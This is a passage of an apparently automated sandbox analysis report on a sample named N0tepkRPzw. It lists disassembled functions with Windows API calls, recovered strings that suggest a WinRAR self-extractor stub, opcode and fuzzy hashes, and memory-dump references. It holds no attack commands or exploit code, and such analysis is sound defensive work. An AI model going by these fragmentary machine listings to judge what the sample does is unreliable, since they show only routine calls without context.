              • Opcode ID: 8568ddbf1c3b56f7d4b91a0583903f6dac8ae0c1405d573c453157fe975e85d6
              • Instruction ID: e42376744b9d9a9aec8806714c104ce03a82010b2ffa4438c0e9f237ce9e55cc
              • Opcode Fuzzy Hash: 8568ddbf1c3b56f7d4b91a0583903f6dac8ae0c1405d573c453157fe975e85d6
              • Instruction Fuzzy Hash: 953159326006059FEB24AB78D949B5A73EAFF00310F18D42EE54DD7651FE71AD809B78
              APIs
              • GetWindow.USER32(?,00000005), ref: 00D6CD51
              • GetClassNameW.USER32(00000000,?,00000800), ref: 00D6CD7D
                • Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00D6CD99
              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D6CDB0
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00D6CDC4
              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D6CDED
              • DeleteObject.GDI32(00000000), ref: 00D6CDF4
              • GetWindow.USER32(00000000,00000002), ref: 00D6CDFD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
              • String ID: STATIC
              • API String ID: 3820355801-1882779555
              • Opcode ID: 6897c87d350da4a96b0d3acb5f67e49fdb297a05098b14cc2356f5d27f062a3f
              • Instruction ID: 20f17bafb5a88b7ff32ed57f3796f08d94521503a586f87b6c633ee945e5f9c3
              • Opcode Fuzzy Hash: 6897c87d350da4a96b0d3acb5f67e49fdb297a05098b14cc2356f5d27f062a3f
              • Instruction Fuzzy Hash: C5110633544710FBE2217B609C4AFBF766CEF55751F044620FA92E1192DA7489068BB4
              APIs
              • _free.LIBCMT ref: 00D78EC5
                • Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
                • Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506
              • _free.LIBCMT ref: 00D78ED1
              • _free.LIBCMT ref: 00D78EDC
              • _free.LIBCMT ref: 00D78EE7
              • _free.LIBCMT ref: 00D78EF2
              • _free.LIBCMT ref: 00D78EFD
              • _free.LIBCMT ref: 00D78F08
              • _free.LIBCMT ref: 00D78F13
              • _free.LIBCMT ref: 00D78F1E
              • _free.LIBCMT ref: 00D78F2C
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 60b01551f0613b55f5d31b581185871b77dd7f1a663a157338bdafc9b994d4e7
              • Instruction ID: 9611a992ee95867cf7eccb1847c959cdf73ab3e0a86fc5e6347dc0e935381139
              • Opcode Fuzzy Hash: 60b01551f0613b55f5d31b581185871b77dd7f1a663a157338bdafc9b994d4e7
              • Instruction Fuzzy Hash: D811D47654010DAFCB15EF94C846CDA3BA6FF04354B0180A1BA0C8B626EA71DA51ABB4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID: ;%u$x%u$xc%u
              • API String ID: 0-2277559157
              • Opcode ID: f8df1df91dff68087adedae92b4a52dcbe7383655f58ee02c8a8bb465da26d48
              • Instruction ID: 99f970955c89c97c99766f6e24e788a0b859fdb0b05053622805e81bfee680a9
              • Opcode Fuzzy Hash: f8df1df91dff68087adedae92b4a52dcbe7383655f58ee02c8a8bb465da26d48
              • Instruction Fuzzy Hash: 9BF100716043405BDF15EF388895BFE779AAF96302F0C0569FC859B283EA64994CC7B2
              APIs
                • Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
                • Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365
              • EndDialog.USER32(?,00000001), ref: 00D6AD20
              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D6AD47
              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D6AD60
              • SetWindowTextW.USER32(?,?), ref: 00D6AD71
              • GetDlgItem.USER32(?,00000065), ref: 00D6AD7A
              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D6AD8E
              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D6ADA4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: MessageSend$Item$TextWindow$Dialog
              • String ID: LICENSEDLG
              • API String ID: 3214253823-2177901306
              • Opcode ID: a6b446e5f00b37ca458e70ceb82bd9e4daf9e9ebea66c1a33710132bb37141a7
              • Instruction ID: 904fe40b095dbec2352fba09da1640ce00de417b9ab1d53ebc0d0581ca3a81e6
              • Opcode Fuzzy Hash: a6b446e5f00b37ca458e70ceb82bd9e4daf9e9ebea66c1a33710132bb37141a7
              • Instruction Fuzzy Hash: 8C21A032244305FBD2216B69EC49E3B3B6CEB46B46F050104F684E26A0EA629D01EF72
              APIs
              • __EH_prolog.LIBCMT ref: 00D59448
              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D5946B
              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D5948A
                • Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2
              • _swprintf.LIBCMT ref: 00D59526
                • Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D
              • MoveFileW.KERNEL32(?,?), ref: 00D59595
              • MoveFileW.KERNEL32(?,?), ref: 00D595D5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
              • String ID: rtmp%d
              • API String ID: 2111052971-3303766350
              • Opcode ID: 413b7e43757ed05dd2f1311c2e59177e62c0a85bc111a7f554f64892aefa4313
              • Instruction ID: f63931a73098feb877f2c6a3c78dba97fa08cd33ab9db2b008eba919b13ecb12
              • Opcode Fuzzy Hash: 413b7e43757ed05dd2f1311c2e59177e62c0a85bc111a7f554f64892aefa4313
              • Instruction Fuzzy Hash: 64413C71900258A6CF20EBA48C95AEEB37CEF15782F0444A5BD49E3142EB748B8DDB74
              APIs
              • __aulldiv.LIBCMT ref: 00D60A9D
                • Part of subcall function 00D5ACF5: GetVersionExW.KERNEL32(?), ref: 00D5AD1A
              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D60AC0
              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D60AD2
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D60AE3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D60AF3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D60B03
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D60B3D
              • __aullrem.LIBCMT ref: 00D60BCB
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
              • String ID:
              • API String ID: 1247370737-0
              • Opcode ID: 7b08ea59520cf500837c86d3386383a7c466fa1665119cd2b92b1af37fe3625c
              • Instruction ID: a5aef8910d638527c356b4132e890b75ae4bd3818093b01e57626a8fff38d5a0
              • Opcode Fuzzy Hash: 7b08ea59520cf500837c86d3386383a7c466fa1665119cd2b92b1af37fe3625c
              • Instruction Fuzzy Hash: 6D4139B54083069FC710DF69C88496BFBF8FF88714F044A2EF59692650E779E548CB62
              APIs
              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00D7F5A2,?,00000000,?,00000000,00000000), ref: 00D7EE6F
              • __fassign.LIBCMT ref: 00D7EEEA
              • __fassign.LIBCMT ref: 00D7EF05
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00D7EF2B
              • WriteFile.KERNEL32(?,?,00000000,00D7F5A2,00000000,?,?,?,?,?,?,?,?,?,00D7F5A2,?), ref: 00D7EF4A
              • WriteFile.KERNEL32(?,?,00000001,00D7F5A2,00000000,?,?,?,?,?,?,?,?,?,00D7F5A2,?), ref: 00D7EF83
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: 0aaf244fbf1d9d55b8515e1f9e8c06528afece8185f7a4b7ce8a0bff04866241
              • Instruction ID: b45f0500fc970c88da2f84ed24e965ccf16693f3dc3ff2553bfa6de1c810779c
              • Opcode Fuzzy Hash: 0aaf244fbf1d9d55b8515e1f9e8c06528afece8185f7a4b7ce8a0bff04866241
              • Instruction Fuzzy Hash: 16519271A002499FDB10CFA8D885AEEFBF9EF09310F24855BE559E7291E7709941CB70
              APIs
              • GetTempPathW.KERNEL32(00000800,?), ref: 00D6C54A
              • _swprintf.LIBCMT ref: 00D6C57E
                • Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D
              • SetDlgItemTextW.USER32(?,00000066,00D9946A), ref: 00D6C59E
              • _wcschr.LIBVCRUNTIME ref: 00D6C5D1
              • EndDialog.USER32(?,00000001), ref: 00D6C6B2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
              • String ID: %s%s%u
              • API String ID: 2892007947-1360425832
              • Opcode ID: 20e75bc98704ceac996422cebddc3c54508b561acb60af8bd9ed685be881e20c
              • Instruction ID: 2257584efc11bf18c44c78de47d4c95d09b7425c18894ee296897024b31c2207
              • Opcode Fuzzy Hash: 20e75bc98704ceac996422cebddc3c54508b561acb60af8bd9ed685be881e20c
              • Instruction Fuzzy Hash: E141D071910618ABDF22DBA4CC45EEA77BCEF08302F0450A6E949E6160E7719BC8CB74
              APIs
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00D68F38
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D68F59
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AllocByteCharGlobalMultiWide
              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
              • API String ID: 3286310052-4209811716
              • Opcode ID: 8df85a8edd5377a45adeff292773a7d4cacee9a2b5acfc9a97aaea3bf25d32d7
              • Instruction ID: 4d8b6339a44f562d6a39db4683eabf4ab6a34e434d54afecc931d457ceb9faf6
              • Opcode Fuzzy Hash: 8df85a8edd5377a45adeff292773a7d4cacee9a2b5acfc9a97aaea3bf25d32d7
              • Instruction Fuzzy Hash: B3312632508312BFD720BB24DC06FAF77A8EF91720F044619F805A62C2FF659A0993B5
              APIs
              • ShowWindow.USER32(?,00000000), ref: 00D6964E
              • GetWindowRect.USER32(?,00000000), ref: 00D69693
              • ShowWindow.USER32(?,00000005,00000000), ref: 00D6972A
              • SetWindowTextW.USER32(?,00000000), ref: 00D69732
              • ShowWindow.USER32(00000000,00000005), ref: 00D69748
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Window$Show$RectText
              • String ID: RarHtmlClassName
              • API String ID: 3937224194-1658105358
              • Opcode ID: a03ffb6e77112ca22676ddc3e2f6ce6ce8bf50c2574dbd1176f9c2f4ab856fde
              • Instruction ID: 0c99b0a4920390f41c9171bf5691dcd90e26e612fc09f032c2f98b28b7bc13f4
              • Opcode Fuzzy Hash: a03ffb6e77112ca22676ddc3e2f6ce6ce8bf50c2574dbd1176f9c2f4ab856fde
              • Instruction Fuzzy Hash: 1831CF32004300EFCB119F68DC49B6BBBACEF48751F048A59FE49AA266DB34D905CB71
              APIs
                • Part of subcall function 00D7BF79: _free.LIBCMT ref: 00D7BFA2
              • _free.LIBCMT ref: 00D7C003
                • Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
                • Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506
              • _free.LIBCMT ref: 00D7C00E
              • _free.LIBCMT ref: 00D7C019
              • _free.LIBCMT ref: 00D7C06D
              • _free.LIBCMT ref: 00D7C078
              • _free.LIBCMT ref: 00D7C083
              • _free.LIBCMT ref: 00D7C08E
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction ID: cad5d598d702eb46e226bf22b125d29767ca709ed53681ab21a685fa5a902ee4
              • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction Fuzzy Hash: 8911CE71580B04FAD620BBB0CC46FCBF79DEF05B10F80C856B29D66552EB66F9049AB0
              APIs
              • GetLastError.KERNEL32(?,?,00D720C1,00D6FB12), ref: 00D720D8
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D720E6
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D720FF
              • SetLastError.KERNEL32(00000000,?,00D720C1,00D6FB12), ref: 00D72151
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 8bc92d78022458d7f5ace9725bb8653781b484fa467889529f63ad4d19e74ae1
              • Instruction ID: 295d8c2d7b8d8829a0852bc185d4159b2c992ba445f7fc4a2dbab12f2bd96da2
              • Opcode Fuzzy Hash: 8bc92d78022458d7f5ace9725bb8653781b484fa467889529f63ad4d19e74ae1
              • Instruction Fuzzy Hash: C00147322183216EB7342BB67C8653A2B48FB127307608A29FB1C942E0FF118C00A634
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID:
              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
              • API String ID: 0-1718035505
              • Opcode ID: d28c56f67252c1e0dde44928e5e12f93ba11bda6f355f26581416bbdd3d50c91
              • Instruction ID: a7a0d9c17b1d14ab9bc9d001541c96cb34f2401b6b54976cd2002facee021f5d
              • Opcode Fuzzy Hash: d28c56f67252c1e0dde44928e5e12f93ba11bda6f355f26581416bbdd3d50c91
              • Instruction Fuzzy Hash: 5801F931F413229B8F606F7B7C812A73B969A45716329033AE541D3300DB61C845DBF0
              APIs
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D60D0D
                • Part of subcall function 00D5ACF5: GetVersionExW.KERNEL32(?), ref: 00D5AD1A
              • LocalFileTimeToFileTime.KERNEL32(?,00D60CB8), ref: 00D60D31
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D60D47
              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D60D56
              • SystemTimeToFileTime.KERNEL32(?,00D60CB8), ref: 00D60D64
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D60D72
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
